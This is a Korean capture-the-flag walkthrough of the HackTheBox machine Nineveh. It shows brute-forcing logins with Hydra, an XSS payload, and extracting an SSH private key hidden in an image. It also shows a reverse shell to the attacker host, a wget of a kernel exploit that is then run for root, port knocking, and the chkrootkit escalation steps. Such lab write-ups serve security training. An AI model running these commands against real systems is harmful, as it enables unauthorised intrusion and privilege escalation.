1. SCANNING
┌──(root💀takudaddy)-[/htb/n]
└─# nmap -A -p- 10.10.10.43 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-22 22:54 KST
Nmap scan report for 10.10.10.43
Host is up (0.20s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
┌──(root💀takudaddy)-[/htb/n]
└─# nmap -sC -sV -sT 10.10.10.43 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-22 22:48 KST
Nmap scan report for 10.10.10.43
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
2. WEB ENUMERATION
http ENUM
┌──(root💀takudaddy)-[~]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 takudaddy.example.com takudaddy
10.10.10.43 nineveh.htb
Bruteforce Password
┌──(root💀takudaddy)-[/htb/n]
└─# cat req.txt
POST /department/login.php HTTP/1.1
Host: 10.10.10.43
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://10.10.10.43
Connection: close
Referer: http://10.10.10.43/department/login.php
Cookie: PHPSESSID=283c6rbr9f4umtp6s6oohpvp32
Upgrade-Insecure-Requests: 1
username=admin&password=admin
┌──(root💀takudaddy)-[/htb/n]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-23 00:16:19
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=^USER^&password=^PASS^:Invalid
[STATUS] 3509.00 tries/min, 3509 tries in 00:01h, 14340890 to do in 68:07h, 64 active
[80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-23 00:17:39
admin : 1q2w3e4r5t
amrois
https:10.10.10.43 ENUM
phpLiteAdmin v1.9
Bruteforce Password
┌──(root💀takudaddy)-[/htb/n]
└─# cat req2.txt
POST /db/index.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*
;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: https://nineveh.htb
Connection: close
Referer: https://nineveh.htb/db/
Cookie: PHPSESSID=9dtr7l53uke76m9tco0nt78585
Upgrade-Insecure-Requests: 1
password=password&remember=yes&login=Log+In&proc_login=true
┌──(root💀takudaddy)-[/htb/n]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-23 00:25:21
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect
[443][http-post-form] host: 10.10.10.43 login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-23 00:26:08
admin : password123
https://www.exploit-db.com/exploits/39714
phpliteadmin 취약 코드 있음
실험
┌──(root💀takudaddy)-[/htb/n]
└─# cat attack.html
URL
https://nineveh.htb/db/index.php?view=import
METHOD
Post
PARAMETER
file
PAYLOAD
"><script>alert('takudaddy')</script>
Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------1675024292505
Content-Length: 1124
-----------------------------1675024292505
Content-Disposition: form-data; name="import_type"
sql
-----------------------------1675024292505
Content-Disposition: form-data; name="single_table"
testtable
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsterminated"
;
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsenclosed"
"
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsescaped"
\
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_replacenull"
NULL
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldnames"
on
-----------------------------1675024292505
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: text/plain
"><script>alert('takudaddy')</script>
-----------------------------1675024292505
Content-Disposition: form-data; name="import"
Import
-----------------------------1675024292505--
┌──(root💀takudaddy)-[/htb/n]
└─# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
됨
다른 창
https://nineveh.htb/secure_notes
사진을 내려받아 살펴보면
┌──(root💀takudaddy)-[/htb/n]
└─# exiftool nineveh.png 1 ⚙
ExifTool Version Number : 12.16
File Name : nineveh.png
Directory : .
File Size : 2.8 MiB
File Modification Date/Time : 2021:04:23 15:40:51+09:00
File Access Date/Time : 2021:04:23 15:40:51+09:00
File Inode Change Date/Time : 2021:04:23 15:40:51+09:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 1497
Image Height : 746
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Significant Bits : 8 8 8
Software : Shutter
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 1497x746
Megapixels : 1.1
┌──(root💀takudaddy)-[/htb/n]
└─# binwalk nineveh.png 1 ⚙
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)
┌──(root💀takudaddy)-[/htb/n]
└─# strings nineveh.png
.....
secret/
0000755
0000041
0000041
00000000000
13126060277
012377
ustar
www-data
www-data
secret/nineveh.priv
0000600
0000041
0000041
00000003213
13126045656
014730
ustar
www-data
www-data
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htbssh 키가 있다.
┌──(root💀takudaddy)-[/htb/n]
└─# binwalk -Me nineveh.png 1 ⚙
Scan Time: 2021-04-23 15:48:26
Target File: /htb/n/nineveh.png
MD5 Checksum: 353b8f5a4578e4472c686b6e1f15c808
Signatures: 391
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)
Scan Time: 2021-04-23 15:48:27
Target File: /htb/n/_nineveh.png.extracted/54
MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e
Signatures: 391
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
Scan Time: 2021-04-23 15:48:27
Target File: /htb/n/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum: 6b60618d207ad97e76664174e805cfda
Signatures: 391
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 OpenSSH RSA public key
Scan Time: 2021-04-23 15:48:27
Target File: /htb/n/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum: f426d661f94b16292efc810ebb7ea305
Signatures: 391
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PEM RSA private key
┌──(root💀takudaddy)-[/htb/n]
└─# ls 1 ⚙
id_rsa nineveh.png _nineveh.png.extracted
┌──(root💀takudaddy)-[/htb/n]
└─# cd _nineveh.png.extracted 1 ⚙
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted]
└─# ls 1 ⚙
2BF8D0.tar 54 54.zlib secret
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted]
└─# cd secret 1 ⚙
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted/secret]
└─# ls 1 ⚙
nineveh.priv nineveh.pub
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted/secret]
└─# cat nineveh.pub 1 ⚙
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HP
VpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNr
ZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9yc
jeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJ
zVNOrU0R amrois@nineveh.htb
amrois 유저의 키
하지만 ssh 포트가 검색이 안 된 상황.
포트 포워딩이 가능할 듯 보이니
침투 후에 다시 살펴본다.
3. EXPLOITATION
URL을 살펴보면 파일 경로가 노출됨
LFI가 가능한지 해본다.
에러 메시지가 뜨는 것으로 보아
취약점은 있는 듯한데 경로 찾기에 실패.
php 페이지에서 새로운 데이터를 생성한다.
새 테이블을 만들고
system 명령어로 내용을 채운 뒤
대표사진 삭제
사진 설명을 입력하세요.
해당 파일을 실행할 경로명 재설정
경로를 변경 후 명령어를 입력해보면
code execution 성공
리스너 기동 후
리버스 쉘을 띄워본다.
(nc 버전 낮아 -e 옵션 안됨 / python3 혹은 php로 붙을 수 있음)
┌──(root💀takudaddy)-[~]
└─# ps
PID TTY TIME CMD
1644 pts/2 00:00:00 zsh
3279 pts/2 00:00:00 ps
┌──(root💀takudaddy)-[~]
└─# bash
┌──(root💀takudaddy)-[~]
└─# ps
PID TTY TIME CMD
1644 pts/2 00:00:00 zsh
3284 pts/2 00:00:00 bash
3287 pts/2 00:00:00 ps
┌──(root💀takudaddy)-[~]
└─# nc -lvnp 7979
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.43] 44810
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@nineveh:/var/www/html/department$ ^Z
[1]+ Stopped nc -lvnp 7979
┌──(root💀takudaddy)-[~]
└─# stty raw -echo
┌──(root💀takudaddy)-[~]
nc -lvnp 7979
www-data@nineveh:/var/www/html/department$
www-data@nineveh:/var/www/html/department$
침투 성공
4. POST EXPLOITATION / PRIVILEGE ESCALATION
간단한 방법
www-data@nineveh:/home/amrois$ uname -a
uname -a
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@nineveh:/home/amrois$ cd /tmp
cd /tmp
www-data@nineveh:/tmp$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-22 23:50:17-- http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'
45010 100%[===================>] 21.74K 107KB/s in 0.2s
2021-04-22 23:50:18 (107 KB/s) - '45010' saved [22264/22264]
www-data@nineveh:/tmp$ chmod +x 45010
chmod +x 45010
www-data@nineveh:/tmp$ ./45010
./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003768e400
[*] Leaking sock struct from ffff88003bb26c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003576a480
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003576a480
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
cat /root/root.txt
a0a36caac7939fdefd5b1009f0933705
다른 방법 1.
www-data@nineveh:/home$ netstat -tul
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:https *:* LISTEN
^C
www-data@nineveh:/home$ netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.43:44806 10.10.14.13:7979 CLOSE_WAIT 13895/python3
tcp 1 0 10.10.10.43:80 10.10.14.13:51022 CLOSE_WAIT -
tcp 0 282 10.10.10.43:44916 10.10.14.13:7979 ESTABLISHED 8443/php
tcp6 0 0 :::22 :::* LISTEN -
www-data@nineveh:/home$ cd /etc/iptables
www-data@nineveh:/etc/iptables$ ls
rules.v4 rules.v6
www-data@nineveh:/etc/iptables$ cat rules.v4
# Generated by iptables-save v1.6.0 on Sun Jul 2 19:37:15 2017
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [140:21895]
-A INPUT -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -j DROP
COMMIT
# Completed on Sun Jul 2 19:37:15 2017
로컬에서 22번 ssh가 운영 중.
포트 노킹이 가능한지 보자
www-data@nineveh:/etc/iptables$ cd /etc/init.d
www-data@nineveh:/etc/init.d$ ls | grep kn*
knockd
www-data@nineveh:/etc/init.d$ cat knockd
#! /bin/sh
### BEGIN INIT INFO
# Provides: knockd
# Required-Start: $network $syslog
# Required-Stop: $network $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: port-knock daemon
### END INIT INFO
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/sbin/knockd
NAME=knockd
PIDFILE=/var/run/$NAME.pid
DEFAULTS_FILE=/etc/default/knockd -> 기본 파일
DESC="Port-knock daemon"
OPTIONS=" -d"
.....
www-data@nineveh:/etc/init.d$ cat /etc/default/knockd
################################################
#
# knockd's default file, for generic sys config
#
################################################
# control if we start knockd at init or not
# 1 = start
# anything else = don't start
#
# PLEASE EDIT /etc/knockd.conf BEFORE ENABLING -> 설정 파일
START_KNOCKD=1
# command line options
KNOCKD_OPTS="-i ens160"
www-data@nineveh:/etc/init.d$ cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
www-data@nineveh:/etc/init.d$
openSSH
sequence 번호 확인 후 노킹 하면
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted/secret]
└─# knock 10.10.10.43 571 290 911
(knocking 프로그램이 없는 상황일 때는)
# nmap -r -Pn 10.10.10.43 -p 571,290,911
혹은
# for i in 571 290 911; do nmap -Pn -p $i --host timeout 201 --max-retries 0 10.10.10.43; done
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted/secret]
└─# nmap 10.10.10.43 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 16:40 KST
Nmap scan report for nineveh.htb (10.10.10.43)
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
포트가 열렸다.
ssh 로그인 시도
┌──(root💀takudaddy)-[/htb/n/_nineveh.png.extracted/secret]
└─# ssh -i nineveh.priv amrois@10.10.10.43 1 ⚙
The authenticity of host '10.10.10.43 (10.10.10.43)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.43' (ECDSA) to the list of known hosts.
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
288 packages can be updated.
207 updates are security updates.
You have mail.
Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ id ; whoami
uid=1000(amrois) gid=1000(amrois) groups=1000(amrois)
amrois
amrois@nineveh:~$ cd /home/amrois
amrois@nineveh:~$ ls
user.txt
amrois@nineveh:~$ cat user.txt
9a50f811ede61b38253171096646a732
amrois@nineveh:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
amrois@nineveh:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/10 * * * * /usr/sbin/report-reset.sh
다른 방법 2.
www-data@nineveh:/home/amrois$ find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
<is$ find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 56456 Jan 14 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 38984 Feb 3 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 20 11:08 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
www-data@nineveh:/home/amrois$
www-data@nineveh:/$ cd report
www-data@nineveh:/report$ ls
report-21-04-23:00:20.txt report-21-04-23:00:22.txt
report-21-04-23:00:21.txt report-21-04-23:00:23.txt
www-data@nineveh:/report$ ls -al
total 40
drwxr-xr-x 2 amrois amrois 4096 Apr 23 00:23 .
drwxr-xr-x 24 root root 4096 Jan 29 03:34 ..
-rw-r--r-- 1 amrois amrois 4815 Apr 23 00:20 report-21-04-23:00:20.txt
-rw-r--r-- 1 amrois amrois 4815 Apr 23 00:21 report-21-04-23:00:21.txt
-rw-r--r-- 1 amrois amrois 4815 Apr 23 00:22 report-21-04-23:00:22.txt
-rw-r--r-- 1 amrois amrois 4815 Apr 23 00:23 report-21-04-23:00:23.txt
www-data@nineveh:/report$ date
Fri Apr 23 00:23:34 CDT 2021
www-data@nineveh:/report$ ls
report-21-04-23:00:20.txt report-21-04-23:00:22.txt
report-21-04-23:00:21.txt report-21-04-23:00:23.txt
www-data@nineveh:/report$ ls
report-21-04-23:00:20.txt report-21-04-23:00:22.txt
report-21-04-23:00:21.txt report-21-04-23:00:23.txt
www-data@nineveh:/report$ cat report-21-04-23\:00\:23
cat: 'report-21-04-23:00:23': No such file or directory
www-data@nineveh:/report$ file report-21-04-23\:00\:23
report-21-04-23:00:23: cannot open `report-21-04-23:00:23' (No such file or directory)
www-data@nineveh:/report$ ls
report-21-04-23:00:20.txt report-21-04-23:00:22.txt report-21-04-23:00:24.txt
report-21-04-23:00:21.txt report-21-04-23:00:23.txt
www-data@nineveh:/report$ file report-21-04-23:00:24.txt
report-21-04-23:00:24.txt: ASCII text
www-data@nineveh:/report$ cat report-21-04-23:00:24.txt
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
...
www-data@nineveh:/run$ IFS=$'\n'
www-data@nineveh:/run$ for i in $(ps -eo command); do echo $i; done;
www-data@nineveh:/tmp$ cat compare.sh
#!/bin/bash
IFS=$'\n'
old_process=$(ps -eo command)
while true;
do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process")
sleep 1
old_process=$new_process
done
www-data@nineveh:/tmp$ ./compare.sh
184a185,188
> /usr/sbin/CRON -f
> /bin/sh -c /root/vulnScan.sh
> /bin/bash /root/vulnScan.sh
> /bin/sh /usr/bin/chkrootkit
188a189
> /usr/bin/find /usr/lib /usr/bin -name red.tar -o -name start.sh -o -name klogd.o -o -name 0anacron-bak -o -name adore
전에 한번 해본
chkrootkit
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
